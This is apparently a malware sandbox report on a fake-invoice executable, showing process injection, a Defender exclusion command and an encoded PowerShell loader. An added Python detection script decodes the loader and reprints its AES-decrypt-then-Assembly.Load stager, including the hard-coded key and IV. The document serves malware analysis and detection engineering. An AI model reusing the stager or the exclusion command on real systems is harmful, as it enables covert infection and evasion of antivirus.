                    $Расшифровщик = $Шифратор.CreateDecryptor($Ключ, $ИнициализирующийВектор)
                    $РасшифрованныеДанные = $Расшифровщик.TransformFinalBlock($Данные, 0, $Данные.Length)
                    return $РасшифрованныеДанные
                }
                $Ключ = [byte[]]@(0x50, 0xB0, 0x5B, 0x3D, 0x71, 0x80, 0xA7, 0xDC, 0xA8, 0x5C, 0x26, 0x9A, 0x7B, 0x92, 0xDD, 0xE7, 0x76, 0xD0, 0xCF, 0x42, 0x90, 0xBB, 0x6F, 0x5F, 0xC4, 0xB8, 0x1D, 0xA6, 0xBE, 0xE4, 0x6C, 0x35)
                $ИнициализирующийВектор = [byte[]]@(0xE7, 0x99, 0x21, 0x27, 0x5A, 0x2D, 0x31, 0x53, 0x0E, 0xBB, 0xE4, 0xEE, 0x2B, 0x94, 0xE3, 0x0C)
                if ($ПоследнийФайл -ne $null) {
                    $ПутьФайла = $ПоследнийФайл.FullName
                    $ЗашифрованныеБайты = [System.IO.File]::ReadAllBytes($ПутьФайла);
                    $РасшифрованноеСодержимое = Расшифровать -Ключ $Ключ -ИнициализирующийВектор $ИнициализирующийВектор -Данные $ЗашифрованныеБайты
                    $Сборка = [System.Reflection.Assembly]::Load([byte[]]@($РасшифрованноеСодержим
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtSetInformationThread: Direct from: 0x77542ECC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQueryValueKey: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtOpenKeyEx: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 1544
            Source: C:\Windows\SysWOW64\chkdsk.exe Thread APC queued: target process: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\calc.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\calc.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 7EF008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
            Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Factura (3).exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedcommand wwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoauwbsaguazqbwacganqawadaamaapaaoacgakabieqaq1bdwenqq9bd0emarpbb8emaq/bdoemaqgad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabuaguabqbwafaayqb0aggakaapaaoajaaobdaemqq7bd4epqqgad0aiaanagyaaqbsagualqaqac4acab1ahqaaqbraccacgakab8epgrbbdsenqq0bd0eoaq5bcqemaq5bdseiaa9acaarwblahqalqbdaggaaqbsagqasqb0aguabqagac0auabhahqaaaagacqaegrabduepaq1bd0epqqwbe8ehwqwbd8eogqwbcaalqbgagkabab0aguacgagacqakaqwbdeeowq+bd0eiab8acaauwbvahiadaatae8aygbqaguaywb0acaatabhahmadabxahiaaqb0aguavabpag0azqagac0arablahmaywblag4azabpag4azwagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbgagkacgbzahqaiaaxaaoacgbmahuabgbjahqaaqbvag4aiaagbdaeqqribdgerarabd4emgqwbeietaqgahsacgagacaaiaagahaayqbyageabqagacgacgagacaaiaagacaaiaagacaawwbiahkadablafsaxqbdacqaggq7be4erwqsaaoaiaagacaaiaagacaaiaagafsaygb5ahqazqbbaf0axqakabgepqq4beyeoaqwbdseoaq3bdgeqardbe4esqq4bdkeegq1bdoeqgq+beaelaakacaaiaagacaaiaagacaaiabbagiaeqb0aguawwbdaf0ajaaubdaepqq9besenqqkacaaiaagacaakqakaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaqgad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbbaguacwbdadoaogbdahiazqbhahqazqaoackacgagacaaiaagacqakaq4beqeqaqwbeiepgrabc4atqbvagqazqagad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbdagkacaboaguacgbnag8azablaf0aoga6aemaqgbdaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaquafaayqbkagqaaqbuagcaiaa9acaawwbtahkacwb0aguabqauafmazqbjahuacgbpahqaeqauaemacgb5ahaadabvagcacgbhahaaaab5ac4auabhagqazabpag4azwbnag8azablaf0aoga6afaaswbdafmanwakaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybekeoaq6bcaapqagacqakaq4beqeqaqwbeiepgrabc4aqwbyaguayqb0aguarablagmacgb5ahaadabvahiakaakaboeowrobecelaagacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqpaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqgad0aiaakacaemarbbegeoarebeaepgqybekeoaq6bc4avabyageabgbzagyabwbyag0argbpag4ayqbsaeiababvagmaawaoacqafaqwbd0epqrlbduelaagadaalaagacqafaqwbd0epqrlbduelgbmaguabgbnahqaaaapaaoacqakacaaiaagacaacgblahqadqbyag4aiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqkah0acgakacqaggq7be4erwqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeaa1adaalaagadaaeabcadaalaagadaaeaa1aeialaagadaaeaazaeqalaagadaaeaa3adealaagadaaeaa4adaalaagadaaeabbadcalaagadaaeabeaemalaagadaaeabbadgalaagadaaeaa1aemalaagadaaeaayadyalaagadaaeaa5aeealaagadaaeaa3aeialaagadaaeaa5adialaagadaaeabeaeqalaagadaaeabfadcalaagadaaeaa3adyalaagadaaeabeadaalaagadaaeabdaeyalaagadaaeaa0adialaagadaaeaa5adaalaagadaaeabcaeialaagadaaeaa2aeyalaagadaaeaa1aeyalaagadaaeabdadqalaagadaaeabcadgalaagadaaeaaxaeqalaagadaaeabbadyalaagadaaeabcaeualaagadaaeabfadqalaagadaaeaa2aemalaagadaaeaazaduakqakacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeabfadcalaagadaaeaa5adkalaagadaaeaayadealaagadaaeaayadcalaagadaaeaa1aeealaagadaaeaayaeqalaagadaaeaazadealaagadaaeaa1admalaagadaaeaawaeualaagada
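            The two PowerShell command lines above are the ones a detection engineer wants to catch: the Add-MpPreference exclusion for the dropped executable, and the encoded stager that sleeps, picks the newest file-*.putik in %TEMP%, decrypts it with a hard-coded key and IV (32-byte key, so AES-256-CBC with PKCS7 padding) and hands the plaintext to Assembly.Load without ever writing a decrypted PE to disk. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It decodes -encodedcommand blobs (Base64 over UTF-16LE), flags Defender exclusions and the decrypt-then-load pattern, and pulls the key, IV and glob out of the decoded script by following what is passed to CreateDecryptor, so renamed variables do not matter. The three command lines it runs over are constructed for the demo (the Sysmon-style shape and the benign backup.ps1 line are assumptions); the key, IV and glob values are those from the decoded script on this page.

```python
"""Triage of the two PowerShell command lines that matter in this report:
the Add-MpPreference exclusion and the encoded sleep / AES-CBC decrypt /
Assembly.Load stager.  Added example, not code from the report or the sample."""
import base64
import re

# Constructed transcription of the decoded stager (identifiers are the script's
# own Cyrillic names; key, IV and glob are the values from the report).  It is
# re-encoded below only to build a realistic sample command line.
STAGER = r"""[System.Threading.Thread]::Sleep(5000)
$ВременнаяПапка = [System.IO.Path]::GetTempPath()
$Шаблон = 'file-*.putik'
$ПоследнийФайл = Get-ChildItem -Path $ВременнаяПапка -Filter $Шаблон | Sort-Object LastWriteTime -Descending | Select-Object -First 1
$Ключ = [byte[]]@(0x50, 0xB0, 0x5B, 0x3D, 0x71, 0x80, 0xA7, 0xDC, 0xA8, 0x5C, 0x26, 0x9A, 0x7B, 0x92, 0xDD, 0xE7, 0x76, 0xD0, 0xCF, 0x42, 0x90, 0xBB, 0x6F, 0x5F, 0xC4, 0xB8, 0x1D, 0xA6, 0xBE, 0xE4, 0x6C, 0x35)
$ИнициализирующийВектор = [byte[]]@(0xE7, 0x99, 0x21, 0x27, 0x5A, 0x2D, 0x31, 0x53, 0x0E, 0xBB, 0xE4, 0xEE, 0x2B, 0x94, 0xE3, 0x0C)
$Шифратор = [System.Security.Cryptography.Aes]::Create()
$Шифратор.Mode = [System.Security.Cryptography.CipherMode]::CBC
$Расшифровщик = $Шифратор.CreateDecryptor($Ключ, $ИнициализирующийВектор)
$ЗашифрованныеБайты = [System.IO.File]::ReadAllBytes($ПоследнийФайл.FullName)
$Сборка = [System.Reflection.Assembly]::Load($Расшифровщик.TransformFinalBlock($ЗашифрованныеБайты, 0, $ЗашифрованныеБайты.Length))
"""

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DEFENDER_EXCL = re.compile(r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)
DECRYPTOR_CALL = re.compile(r"\.CreateDecryptor\(\s*\$([^\s,)]+)\s*,\s*\$([^\s,)]+)\s*\)")
QUOTED_GLOB = re.compile(r"'([^']*\*[^']*)'")


def decode_encoded_command(blob):
    """Reverse `powershell -encodedcommand`: Base64 over UTF-16LE (case-sensitive)."""
    padded = blob + "=" * (-len(blob) % 4)  # some loggers strip the '=' padding
    return base64.b64decode(padded).decode("utf-16-le", errors="replace")


def byte_array_literal(script, var):
    """Resolve `$var = [byte[]]@(0x.., ...)` to bytes; None if the variable is not a literal."""
    m = re.search(re.escape("$" + var) + r"\s*=\s*\[byte\[\]\]\s*@\(([^)]*)\)", script)
    if not m:
        return None
    return bytes(int(tok, 16) for tok in re.findall(r"0x[0-9A-Fa-f]{1,2}", m.group(1)))


def extract_stager_config(script):
    """Key and IV are whatever is handed to CreateDecryptor; the glob is the first '*' string."""
    cfg = {"key": None, "iv": None, "glob": None}
    call = DECRYPTOR_CALL.search(script)
    if call:
        cfg["key"] = byte_array_literal(script, call.group(1))
        cfg["iv"] = byte_array_literal(script, call.group(2))
    glob = QUOTED_GLOB.search(script)
    if glob:
        cfg["glob"] = glob.group(1)
    return cfg


def triage_cmdline(cmdline):
    """Classify one process-creation command line."""
    f = {"defender_exclusion": bool(DEFENDER_EXCL.search(cmdline)),
         "encoded_command": False, "inmemory_loader": False, "config": None}
    m = ENC_FLAG.search(cmdline)
    if not m:
        return f
    f["encoded_command"] = True
    try:
        script = decode_encoded_command(m.group(1))
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return f
    # Decrypt-then-reflectively-load is the stager's signature, independent of identifier names.
    if "Cryptography.Aes" in script and re.search(r"Assembly\]::Load\(", script):
        f["inmemory_loader"] = True
        f["config"] = extract_stager_config(script)
    return f


# Constructed Sysmon-style command lines: the two from the report plus a benign one.
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference '
    '-ExclusionPath "C:\\Users\\user\\Desktop\\Factura (3).exe" -Force',
    "powershell.exe -encodedcommand " + base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


def triage_all(cmdlines=SAMPLE_CMDLINES):
    return [triage_cmdline(c) for c in cmdlines]


if __name__ == "__main__":
    for cmdline, result in zip(SAMPLE_CMDLINES, triage_all()):
        summary = {k: v for k, v in result.items() if k != "config"}
        if result["config"]:
            summary["aes_key_bits"] = 8 * len(result["config"]["key"])
            summary["glob"] = result["config"]["glob"]
        print(cmdline[:60], "->", summary)
```

            Two practical notes. The encoded blob as printed on this page is case-folded to lowercase, and Base64 is case-sensitive, so it cannot be fed to decode_encoded_command as shown; take the blob from the process-creation event itself. Once the key and IV are recovered, the same AES-256-CBC/PKCS7 parameters decrypt a captured file-*.putik offline, so the payload can be carved and hashed without running the stager.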
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: 6_2_00007FF7341093F0 cpuid 6_2_00007FF7341093F0
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: GetLocaleInfoW, 6_2_00007FF7340F85D0
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: GetLocaleInfoW, 6_2_00007FF734103E74
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_00007FF734103768
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_00007FF734103FCC
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: GetLocaleInfoW, 6_2_00007FF73410407C
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: EnumSystemLocalesW, 6_2_00007FF7340F8150
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_00007FF7341041B0
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: EnumSystemLocalesW, 6_2_00007FF734103AC4
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: EnumSystemLocalesW, 6_2_00007FF734103B94
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_00007FF734103C2C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
